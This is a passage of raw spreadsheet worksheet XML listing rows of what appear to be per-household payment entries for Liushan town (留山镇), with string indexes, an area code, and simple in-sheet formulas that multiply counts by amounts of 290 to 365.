        <v>225</v>
      </c>
    </row>
    <row r="1228" customHeight="1" spans="1:11">
      <c r="A1228" s="16" t="s">
        <v>3293</v>
      </c>
      <c r="B1228" s="17" t="str">
        <f>B1227</f>
        <v>留山镇</v>
      </c>
      <c r="C1228" s="17" t="str">
        <f>C1227</f>
        <v>留山镇</v>
      </c>
      <c r="D1228" s="16" t="s">
        <v>3294</v>
      </c>
      <c r="E1228" s="16" t="s">
        <v>3271</v>
      </c>
      <c r="F1228" s="17">
        <f>F1227</f>
        <v>4113210399</v>
      </c>
      <c r="G1228" s="17"/>
      <c r="H1228" s="17"/>
      <c r="I1228" s="17"/>
      <c r="J1228" s="17"/>
      <c r="K1228" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1229" customHeight="1" spans="1:11">
      <c r="A1229" s="16" t="s">
        <v>3295</v>
      </c>
      <c r="B1229" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1229" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1229" s="17" t="s">
        <v>3296</v>
      </c>
      <c r="E1229" s="17" t="s">
        <v>3274</v>
      </c>
      <c r="F1229" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1229" s="17">
        <v>1</v>
      </c>
      <c r="H1229" s="18">
        <v>365</v>
      </c>
      <c r="I1229" s="17">
        <f>H1229*G1229</f>
        <v>365</v>
      </c>
      <c r="J1229" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1229" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1230" customHeight="1" spans="1:11">
      <c r="A1230" s="16" t="s">
        <v>3297</v>
      </c>
      <c r="B1230" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1230" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1230" s="17" t="s">
        <v>870</v>
      </c>
      <c r="E1230" s="17" t="s">
        <v>3211</v>
      </c>
      <c r="F1230" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1230" s="17">
        <v>1</v>
      </c>
      <c r="H1230" s="18">
        <v>365</v>
      </c>
      <c r="I1230" s="17">
        <f>H1230*G1230</f>
        <v>365</v>
      </c>
      <c r="J1230" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1230" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1231" customHeight="1" spans="1:11">
      <c r="A1231" s="16" t="s">
        <v>3298</v>
      </c>
      <c r="B1231" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1231" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1231" s="17" t="s">
        <v>3299</v>
      </c>
      <c r="E1231" s="17" t="s">
        <v>3300</v>
      </c>
      <c r="F1231" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1231" s="17">
        <v>1</v>
      </c>
      <c r="H1231" s="18">
        <v>365</v>
      </c>
      <c r="I1231" s="17">
        <f>H1231*G1231</f>
        <v>365</v>
      </c>
      <c r="J1231" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1231" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1232" customHeight="1" spans="1:11">
      <c r="A1232" s="16" t="s">
        <v>3301</v>
      </c>
      <c r="B1232" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1232" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1232" s="17" t="s">
        <v>3302</v>
      </c>
      <c r="E1232" s="17" t="s">
        <v>3303</v>
      </c>
      <c r="F1232" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1232" s="17">
        <v>2</v>
      </c>
      <c r="H1232" s="18">
        <v>325</v>
      </c>
      <c r="I1232" s="17">
        <f>H1232*G1232</f>
        <v>650</v>
      </c>
      <c r="J1232" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1232" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1233" customHeight="1" spans="1:11">
      <c r="A1233" s="16" t="s">
        <v>3304</v>
      </c>
      <c r="B1233" s="17" t="str">
        <f>B1232</f>
        <v>留山镇</v>
      </c>
      <c r="C1233" s="17" t="str">
        <f>C1232</f>
        <v>留山镇</v>
      </c>
      <c r="D1233" s="16" t="s">
        <v>3305</v>
      </c>
      <c r="E1233" s="16" t="s">
        <v>2478</v>
      </c>
      <c r="F1233" s="17">
        <f>F1232</f>
        <v>4113210399</v>
      </c>
      <c r="G1233" s="17"/>
      <c r="H1233" s="17"/>
      <c r="I1233" s="17"/>
      <c r="J1233" s="17"/>
      <c r="K1233" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1234" customHeight="1" spans="1:11">
      <c r="A1234" s="16" t="s">
        <v>3306</v>
      </c>
      <c r="B1234" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1234" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1234" s="17" t="s">
        <v>3307</v>
      </c>
      <c r="E1234" s="17" t="s">
        <v>3308</v>
      </c>
      <c r="F1234" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1234" s="17">
        <v>2</v>
      </c>
      <c r="H1234" s="18">
        <v>325</v>
      </c>
      <c r="I1234" s="17">
        <f>H1234*G1234</f>
        <v>650</v>
      </c>
      <c r="J1234" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1234" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1235" customHeight="1" spans="1:11">
      <c r="A1235" s="16" t="s">
        <v>3309</v>
      </c>
      <c r="B1235" s="17" t="str">
        <f>B1234</f>
        <v>留山镇</v>
      </c>
      <c r="C1235" s="17" t="str">
        <f>C1234</f>
        <v>留山镇</v>
      </c>
      <c r="D1235" s="16" t="s">
        <v>3310</v>
      </c>
      <c r="E1235" s="16" t="s">
        <v>3311</v>
      </c>
      <c r="F1235" s="17">
        <f>F1234</f>
        <v>4113210399</v>
      </c>
      <c r="G1235" s="17"/>
      <c r="H1235" s="17"/>
      <c r="I1235" s="17"/>
      <c r="J1235" s="17"/>
      <c r="K1235" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1236" customHeight="1" spans="1:11">
      <c r="A1236" s="16" t="s">
        <v>3312</v>
      </c>
      <c r="B1236" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1236" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1236" s="17" t="s">
        <v>3313</v>
      </c>
      <c r="E1236" s="17" t="s">
        <v>3314</v>
      </c>
      <c r="F1236" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1236" s="17">
        <v>2</v>
      </c>
      <c r="H1236" s="18">
        <v>325</v>
      </c>
      <c r="I1236" s="17">
        <f>H1236*G1236</f>
        <v>650</v>
      </c>
      <c r="J1236" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1236" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1237" customHeight="1" spans="1:11">
      <c r="A1237" s="16" t="s">
        <v>3315</v>
      </c>
      <c r="B1237" s="17" t="str">
        <f>B1236</f>
        <v>留山镇</v>
      </c>
      <c r="C1237" s="17" t="str">
        <f>C1236</f>
        <v>留山镇</v>
      </c>
      <c r="D1237" s="16" t="s">
        <v>3316</v>
      </c>
      <c r="E1237" s="16" t="s">
        <v>3317</v>
      </c>
      <c r="F1237" s="17">
        <f>F1236</f>
        <v>4113210399</v>
      </c>
      <c r="G1237" s="17"/>
      <c r="H1237" s="17"/>
      <c r="I1237" s="17"/>
      <c r="J1237" s="17"/>
      <c r="K1237" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1238" customHeight="1" spans="1:11">
      <c r="A1238" s="16" t="s">
        <v>3318</v>
      </c>
      <c r="B1238" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1238" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1238" s="17" t="s">
        <v>3319</v>
      </c>
      <c r="E1238" s="17" t="s">
        <v>3259</v>
      </c>
      <c r="F1238" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1238" s="17">
        <v>2</v>
      </c>
      <c r="H1238" s="18">
        <v>325</v>
      </c>
      <c r="I1238" s="17">
        <f>H1238*G1238</f>
        <v>650</v>
      </c>
      <c r="J1238" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1238" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1239" customHeight="1" spans="1:11">
      <c r="A1239" s="16" t="s">
        <v>3320</v>
      </c>
      <c r="B1239" s="17" t="str">
        <f>B1238</f>
        <v>留山镇</v>
      </c>
      <c r="C1239" s="17" t="str">
        <f>C1238</f>
        <v>留山镇</v>
      </c>
      <c r="D1239" s="16" t="s">
        <v>3321</v>
      </c>
      <c r="E1239" s="16" t="s">
        <v>3314</v>
      </c>
      <c r="F1239" s="17">
        <f>F1238</f>
        <v>4113210399</v>
      </c>
      <c r="G1239" s="17"/>
      <c r="H1239" s="17"/>
      <c r="I1239" s="17"/>
      <c r="J1239" s="17"/>
      <c r="K1239" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1240" customHeight="1" spans="1:11">
      <c r="A1240" s="16" t="s">
        <v>3322</v>
      </c>
      <c r="B1240" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1240" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1240" s="17" t="s">
        <v>3323</v>
      </c>
      <c r="E1240" s="17" t="s">
        <v>3268</v>
      </c>
      <c r="F1240" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1240" s="17">
        <v>1</v>
      </c>
      <c r="H1240" s="18">
        <v>365</v>
      </c>
      <c r="I1240" s="17">
        <f>H1240*G1240</f>
        <v>365</v>
      </c>
      <c r="J1240" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1240" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1241" customHeight="1" spans="1:11">
      <c r="A1241" s="16" t="s">
        <v>3324</v>
      </c>
      <c r="B1241" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1241" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1241" s="17" t="s">
        <v>3325</v>
      </c>
      <c r="E1241" s="17" t="s">
        <v>3229</v>
      </c>
      <c r="F1241" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1241" s="17">
        <v>1</v>
      </c>
      <c r="H1241" s="18">
        <v>365</v>
      </c>
      <c r="I1241" s="17">
        <f>H1241*G1241</f>
        <v>365</v>
      </c>
      <c r="J1241" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1241" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1242" customHeight="1" spans="1:11">
      <c r="A1242" s="16" t="s">
        <v>3326</v>
      </c>
      <c r="B1242" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1242" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1242" s="17" t="s">
        <v>3327</v>
      </c>
      <c r="E1242" s="17" t="s">
        <v>3328</v>
      </c>
      <c r="F1242" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1242" s="17">
        <v>1</v>
      </c>
      <c r="H1242" s="18">
        <v>365</v>
      </c>
      <c r="I1242" s="17">
        <f>H1242*G1242</f>
        <v>365</v>
      </c>
      <c r="J1242" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1242" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1243" customHeight="1" spans="1:11">
      <c r="A1243" s="16" t="s">
        <v>3329</v>
      </c>
      <c r="B1243" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1243" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1243" s="17" t="s">
        <v>3330</v>
      </c>
      <c r="E1243" s="17" t="s">
        <v>3331</v>
      </c>
      <c r="F1243" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1243" s="17">
        <v>1</v>
      </c>
      <c r="H1243" s="18">
        <v>365</v>
      </c>
      <c r="I1243" s="17">
        <f>H1243*G1243</f>
        <v>365</v>
      </c>
      <c r="J1243" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1243" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1244" customHeight="1" spans="1:11">
      <c r="A1244" s="16" t="s">
        <v>3332</v>
      </c>
      <c r="B1244" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1244" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1244" s="17" t="s">
        <v>3333</v>
      </c>
      <c r="E1244" s="17" t="s">
        <v>3334</v>
      </c>
      <c r="F1244" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1244" s="17">
        <v>2</v>
      </c>
      <c r="H1244" s="18">
        <v>325</v>
      </c>
      <c r="I1244" s="17">
        <f>H1244*G1244</f>
        <v>650</v>
      </c>
      <c r="J1244" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1244" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1245" customHeight="1" spans="1:11">
      <c r="A1245" s="16" t="s">
        <v>3335</v>
      </c>
      <c r="B1245" s="17" t="str">
        <f>B1244</f>
        <v>留山镇</v>
      </c>
      <c r="C1245" s="17" t="str">
        <f>C1244</f>
        <v>留山镇</v>
      </c>
      <c r="D1245" s="16" t="s">
        <v>3336</v>
      </c>
      <c r="E1245" s="16" t="s">
        <v>3220</v>
      </c>
      <c r="F1245" s="17">
        <f>F1244</f>
        <v>4113210399</v>
      </c>
      <c r="G1245" s="17"/>
      <c r="H1245" s="17"/>
      <c r="I1245" s="17"/>
      <c r="J1245" s="17"/>
      <c r="K1245" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1246" customHeight="1" spans="1:11">
      <c r="A1246" s="16" t="s">
        <v>3337</v>
      </c>
      <c r="B1246" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1246" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1246" s="17" t="s">
        <v>3338</v>
      </c>
      <c r="E1246" s="17" t="s">
        <v>3339</v>
      </c>
      <c r="F1246" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1246" s="17">
        <v>3</v>
      </c>
      <c r="H1246" s="18">
        <v>290</v>
      </c>
      <c r="I1246" s="17">
        <f>H1246*G1246</f>
        <v>870</v>
      </c>
      <c r="J1246" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1246" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1247" customHeight="1" spans="1:11">
      <c r="A1247" s="16" t="s">
        <v>3340</v>
      </c>
      <c r="B1247" s="17" t="str">
        <f>B1246</f>
        <v>留山镇</v>
      </c>
      <c r="C1247" s="17" t="str">
        <f>C1246</f>
        <v>留山镇</v>
      </c>
      <c r="D1247" s="16" t="s">
        <v>3341</v>
      </c>
      <c r="E1247" s="16" t="s">
        <v>3342</v>
      </c>
      <c r="F1247" s="17">
        <f>F1246</f>
        <v>4113210399</v>
      </c>
      <c r="G1247" s="17"/>
      <c r="H1247" s="17"/>
      <c r="I1247" s="17"/>
      <c r="J1247" s="17"/>
      <c r="K1247" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1248" customHeight="1" spans="1:11">
      <c r="A1248" s="16" t="s">
        <v>3343</v>
      </c>
      <c r="B1248" s="17" t="str">
        <f>B1247</f>
        <v>留山镇</v>
      </c>
      <c r="C1248" s="17" t="str">
        <f>C1247</f>
        <v>留山镇</v>
      </c>
      <c r="D1248" s="16" t="s">
        <v>3344</v>
      </c>
      <c r="E1248" s="16" t="s">
        <v>3345</v>
      </c>
      <c r="F1248" s="17">
        <f>F1247</f>
        <v>4113210399</v>
      </c>
      <c r="G1248" s="17"/>
      <c r="H1248" s="17"/>
      <c r="I1248" s="17"/>
      <c r="J1248" s="17"/>
      <c r="K1248" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1249" customHeight="1" spans="1:11">
      <c r="A1249" s="16" t="s">
        <v>3346</v>
      </c>
      <c r="B1249" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1249" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1249" s="17" t="s">
        <v>3347</v>
      </c>
      <c r="E1249" s="17" t="s">
        <v>3334</v>
      </c>
      <c r="F1249" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1249" s="17">
        <v>1</v>
      </c>
      <c r="H1249" s="18">
        <v>365</v>
      </c>
      <c r="I1249" s="17">
        <f t="shared" ref="I1249:I1261" si="61">H1249*G1249</f>
        <v>365</v>
      </c>
      <c r="J1249" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1249" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1250" customHeight="1" spans="1:11">
      <c r="A1250" s="16" t="s">
        <v>3348</v>
      </c>
      <c r="B1250" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1250" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1250" s="17" t="s">
        <v>3349</v>
      </c>
      <c r="E1250" s="17" t="s">
        <v>3339</v>
      </c>
      <c r="F1250" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1250" s="17">
        <v>1</v>
      </c>
      <c r="H1250" s="18">
        <v>365</v>
      </c>
      <c r="I1250" s="17">
        <f t="shared" si="61"/>
        <v>365</v>
      </c>
      <c r="J1250" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1250" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1251" customHeight="1" spans="1:11">
      <c r="A1251" s="16" t="s">
        <v>3350</v>
      </c>
      <c r="B1251" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1251" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1251" s="17" t="s">
        <v>3351</v>
      </c>
      <c r="E1251" s="17" t="s">
        <v>3352</v>
      </c>
      <c r="F1251" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1251" s="17">
        <v>1</v>
      </c>
      <c r="H1251" s="18">
        <v>365</v>
      </c>
      <c r="I1251" s="17">
        <f t="shared" si="61"/>
        <v>365</v>
      </c>
      <c r="J1251" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1251" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1252" customHeight="1" spans="1:11">
      <c r="A1252" s="16" t="s">
        <v>3353</v>
      </c>
      <c r="B1252" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1252" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1252" s="17" t="s">
        <v>3354</v>
      </c>
      <c r="E1252" s="17" t="s">
        <v>3355</v>
      </c>
      <c r="F1252" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1252" s="17">
        <v>1</v>
      </c>
      <c r="H1252" s="18">
        <v>365</v>
      </c>
      <c r="I1252" s="17">
        <f t="shared" si="61"/>
        <v>365</v>
      </c>
      <c r="J1252" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1252" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1253" customHeight="1" spans="1:11">
      <c r="A1253" s="16" t="s">
        <v>3356</v>
      </c>
      <c r="B1253" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1253" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1253" s="17" t="s">
        <v>3357</v>
      </c>
      <c r="E1253" s="17" t="s">
        <v>3358</v>
      </c>
      <c r="F1253" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1253" s="17">
        <v>1</v>
      </c>
      <c r="H1253" s="18">
        <v>365</v>
      </c>
      <c r="I1253" s="17">
        <f t="shared" si="61"/>
        <v>365</v>
      </c>
      <c r="J1253" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1253" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1254" customHeight="1" spans="1:11">
      <c r="A1254" s="16" t="s">
        <v>3359</v>
      </c>
      <c r="B1254" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1254" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1254" s="17" t="s">
        <v>3360</v>
      </c>
      <c r="E1254" s="17" t="s">
        <v>3331</v>
      </c>
      <c r="F1254" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1254" s="17">
        <v>2</v>
      </c>
      <c r="H1254" s="18">
        <v>325</v>
      </c>
      <c r="I1254" s="17">
        <f t="shared" si="61"/>
        <v>650</v>
      </c>
      <c r="J1254" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1254" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1255" customHeight="1" spans="1:11">
      <c r="A1255" s="16" t="s">
        <v>3361</v>
      </c>
      <c r="B1255" s="17" t="str">
        <f>B1254</f>
        <v>留山镇</v>
      </c>
      <c r="C1255" s="17" t="str">
        <f>C1254</f>
        <v>留山镇</v>
      </c>
      <c r="D1255" s="16" t="s">
        <v>3362</v>
      </c>
      <c r="E1255" s="16" t="s">
        <v>3363</v>
      </c>
      <c r="F1255" s="17">
        <f>F1254</f>
        <v>4113210399</v>
      </c>
      <c r="G1255" s="17"/>
      <c r="H1255" s="17"/>
      <c r="I1255" s="17"/>
      <c r="J1255" s="17"/>
      <c r="K1255" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1256" customHeight="1" spans="1:11">
      <c r="A1256" s="16" t="s">
        <v>3364</v>
      </c>
      <c r="B1256" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1256" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1256" s="17" t="s">
        <v>3365</v>
      </c>
      <c r="E1256" s="17" t="s">
        <v>3366</v>
      </c>
      <c r="F1256" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1256" s="17">
        <v>2</v>
      </c>
      <c r="H1256" s="18">
        <v>325</v>
      </c>
      <c r="I1256" s="17">
        <f>H1256*G1256</f>
        <v>650</v>
      </c>
      <c r="J1256" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1256" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1257" customHeight="1" spans="1:11">
      <c r="A1257" s="16" t="s">
        <v>3367</v>
      </c>
      <c r="B1257" s="17" t="str">
        <f>B1256</f>
        <v>留山镇</v>
      </c>
      <c r="C1257" s="17" t="str">
        <f>C1256</f>
        <v>留山镇</v>
      </c>
      <c r="D1257" s="17" t="s">
        <v>3368</v>
      </c>
      <c r="E1257" s="16" t="s">
        <v>3369</v>
      </c>
      <c r="F1257" s="17">
        <f>F1256</f>
        <v>4113210399</v>
      </c>
      <c r="G1257" s="17"/>
      <c r="H1257" s="17"/>
      <c r="I1257" s="17"/>
      <c r="J1257" s="17"/>
      <c r="K1257" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1258" customHeight="1" spans="1:11">
      <c r="A1258" s="16" t="s">
        <v>3370</v>
      </c>
      <c r="B1258" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1258" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1258" s="17" t="s">
        <v>3371</v>
      </c>
      <c r="E1258" s="17" t="s">
        <v>3372</v>
      </c>
      <c r="F1258" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1258" s="17">
        <v>1</v>
      </c>
      <c r="H1258" s="18">
        <v>365</v>
      </c>
      <c r="I1258" s="17">
        <f>H1258*G1258</f>
        <v>365</v>
      </c>
      <c r="J1258" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1258" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1259" customHeight="1" spans="1:11">
      <c r="A1259" s="16" t="s">
        <v>3373</v>
      </c>
      <c r="B1259" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1259" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1259" s="17" t="s">
        <v>3374</v>
      </c>
      <c r="E1259" s="17" t="s">
        <v>3223</v>
      </c>
      <c r="F1259" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1259" s="17">
        <v>1</v>
      </c>
      <c r="H1259" s="18">
        <v>365</v>
      </c>
      <c r="I1259" s="17">
        <f>H1259*G1259</f>
        <v>365</v>
      </c>
      <c r="J1259" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1259" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1260" customHeight="1" spans="1:11">
      <c r="A1260" s="16" t="s">
        <v>3375</v>
      </c>
      <c r="B1260" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1260" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1260" s="17" t="s">
        <v>3376</v>
      </c>
      <c r="E1260" s="17" t="s">
        <v>3314</v>
      </c>
      <c r="F1260" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1260" s="17">
        <v>1</v>
      </c>
      <c r="H1260" s="18">
        <v>365</v>
      </c>
      <c r="I1260" s="17">
        <f>H1260*G1260</f>
        <v>365</v>
      </c>
      <c r="J1260" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1260" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1261" customHeight="1" spans="1:11">
      <c r="A1261" s="16" t="s">
        <v>3377</v>
      </c>
      <c r="B1261" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1261" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1261" s="17" t="s">
        <v>3378</v>
      </c>
      <c r="E1261" s="17" t="s">
        <v>2478</v>
      </c>
      <c r="F1261" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1261" s="17">
        <v>1</v>
      </c>
      <c r="H1261" s="18">
        <v>365</v>
      </c>
      <c r="I1261" s="17">
        <f>H1261*G1261</f>
        <v>365</v>
      </c>
      <c r="J1261" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1261" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1262" customHeight="1" spans="1:11">
      <c r="A1262" s="16" t="s">
        <v>3379</v>
      </c>
      <c r="B1262" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1262" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1262" s="17" t="s">
        <v>3380</v>
      </c>
      <c r="E1262" s="17" t="s">
        <v>3381</v>
      </c>
      <c r="F1262" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1262" s="17">
        <v>3</v>
      </c>
      <c r="H1262" s="18">
        <v>290</v>
      </c>
      <c r="I1262" s="17">
        <f>H1262*G1262</f>
        <v>870</v>
      </c>
      <c r="J1262" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1262" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1263" customHeight="1" spans="1:11">
      <c r="A1263" s="16" t="s">
        <v>3382</v>
      </c>
      <c r="B1263" s="17" t="str">
        <f>B1262</f>
        <v>留山镇</v>
      </c>
      <c r="C1263" s="17" t="str">
        <f>C1262</f>
        <v>留山镇</v>
      </c>
      <c r="D1263" s="16" t="s">
        <v>3383</v>
      </c>
      <c r="E1263" s="25" t="s">
        <v>3384</v>
      </c>
      <c r="F1263" s="17">
        <f>F1262</f>
        <v>4113210399</v>
      </c>
      <c r="G1263" s="17"/>
      <c r="H1263" s="17"/>
      <c r="I1263" s="17"/>
      <c r="J1263" s="17"/>
      <c r="K1263" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1264" customHeight="1" spans="1:11">
      <c r="A1264" s="16" t="s">
        <v>3385</v>
      </c>
      <c r="B1264" s="17" t="str">
        <f>B1263</f>
        <v>留山镇</v>
      </c>
      <c r="C1264" s="17" t="str">
        <f>C1263</f>
        <v>留山镇</v>
      </c>
      <c r="D1264" s="16" t="s">
        <v>3386</v>
      </c>
      <c r="E1264" s="16" t="s">
        <v>3387</v>
      </c>
      <c r="F1264" s="17">
        <f>F1263</f>
        <v>4113210399</v>
      </c>
      <c r="G1264" s="17"/>
      <c r="H1264" s="17"/>
      <c r="I1264" s="17"/>
      <c r="J1264" s="17"/>
      <c r="K1264" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1265" customHeight="1" spans="1:11">
      <c r="A1265" s="16" t="s">
        <v>3388</v>
      </c>
      <c r="B1265" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1265" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1265" s="17" t="s">
        <v>3389</v>
      </c>
      <c r="E1265" s="17" t="s">
        <v>3390</v>
      </c>
      <c r="F1265" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1265" s="17">
        <v>1</v>
      </c>
      <c r="H1265" s="18">
        <v>365</v>
      </c>
      <c r="I1265" s="17">
        <f>H1265*G1265</f>
        <v>365</v>
      </c>
      <c r="J1265" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1265" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1266" customHeight="1" spans="1:11">
      <c r="A1266" s="16" t="s">
        <v>3391</v>
      </c>
      <c r="B1266" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1266" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1266" s="17" t="s">
        <v>3392</v>
      </c>
      <c r="E1266" s="17" t="s">
        <v>3393</v>
      </c>
      <c r="F1266" s="17">
        <v>4113210399</v>
      </c>
      <c r="G1266" s="17">
        <v>1</v>
      </c>
      <c r="H1266" s="18">
        <v>365</v>
      </c>
      <c r="I1266" s="17">
        <f>H1266*G1266</f>
        <v>365</v>
      </c>
      <c r="J1266" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1266" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1267" customHeight="1" spans="1:11">
      <c r="A1267" s="16" t="s">
        <v>3394</v>
      </c>
      <c r="B1267" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="C1267" s="17" t="s">
        <v>3206</v>
      </c>
      <c r="D1267" s="17" t="s">
        <v>3395</v>
      </c>
      <c r="E1267" s="17" t="s">
        <v>3280</v>
      </c>
      <c r="F1267" s="17">
        <v>4113210399</v>
      </c>
